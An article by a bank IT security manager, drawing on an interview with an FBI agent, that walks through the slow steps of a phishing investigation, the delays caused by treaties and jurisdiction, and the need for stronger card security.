By John Jaser
Do you wonder what law enforcement is doing about phishing? Certainly they’re investigating these attacks. Occasionally we hear about fines and convictions for crimes that occurred years earlier. In the meanwhile, the attacks and losses from phishing keep rising – to $100 million per year.
To learn about our law enforcement efforts, I called Special Agent Martin McBride, who investigates computer crime for the FBI. Mr. McBride took me through the typical steps of a phishing investigation and it was eye opening, to say the least. Here is the chronology of a typical FBI phishing investigation:
Someone alerts the Bureau that a phishing attack is under way. The FBI requests the phishing e-mail from the person who made the complaint, then examines the e-mail to determine where a respondent would go. This will be a fraudulent version of the bank’s Web site.
Accessing the Files
Next, the FBI asks the Web host for the files that compose the fraudulent site. Most Web hosts are helpful, though ignorant of the fraudulent site. The agent then scours the files to determine the e-mail address where phished information will be sent. The agent then requests a subpoena to examine the access logs going to that address. Time elapsed – about one to three days.
Mr. McBride reports that getting a subpoena can take a few hours to a few days. With subpoena in hand, the agent asks the host e-mail site for the connection logs which can reveal who is accessing the phishing e-mail accounts. More often than not, the addresses used by the phisher mask the real address, which means more subpoenas and more time. Time elapsed between request and receipt of the logs is seven to 10 days. At least two weeks have now elapsed since the initial complaint.
After taking time to analyze the data gathered to this point, the FBI can assemble a search warrant to investigate the actual content of the phisher’s e-mail account. Reviewing the content of the accounts is where the success of a phishing scheme is most evident. Some accounts have been found to contain more than 15,000 credit cards. Search warrants in the United States can take, on average, one week to write and another week to obtain and execute.
While most phishing sites seem to be hosted inside the United States, most of the phishers themselves seem to be located outside of the country, says McBride. This is a major impediment to FBI investigations, since the FBI has no jurisdiction outside the country.
To overcome this restriction, the investigating agency can request assistance from other countries under a Mutual Legal Assistance Treaty (MLAT) with the other country. This process can consume as little as a few months, but more likely takes a year or longer. “The longer the process takes, the less likely it is that a phisher will be caught,” says McBride.
The irony is that MLATs were designed by the U.S. Department of State to improve the effectiveness of cross-border judicial assistance. An MLAT can grant an FBI agent the power to summon witnesses, compel the production of evidence and issue search warrants in another country.
“In reality,” says McBride, “an MLAT is only as good as the relationship between local enforcement officers in the U.S. and [those] in the foreign country.”
McBride says that most European countries are helpful, while many countries in Eastern Europe and Asia are not. “Unfortunately, most computer crimes seem to originate in Eastern Europe and Asia,” he said.
A Year and Counting
One of the FBI’s more successful phishing investigations is nearing the end of its second year and chances are that convicting the known phishing perpetrators will prevent very little phishing. The Russian mafia and others run so many chat rooms to buy and sell stolen debit and credit cards that law enforcement can’t possibly cover them all. “We can only go after the big fish,” says McBride.
Better response time and less time-consuming procedures would certainly improve the situation. But more importantly, banks need to further improve debit and credit card security to prevent our unwitting customers from surrendering enough of their personal information for a phisher to create a “full” card ready for fraud.
The phishers won’t play when the game doesn’t pay.
John Jazer is Internet security manager at Avon-based COCC Inc. (www.cocc.com), a 39-year-old firm specializing in outsourced information technology and support.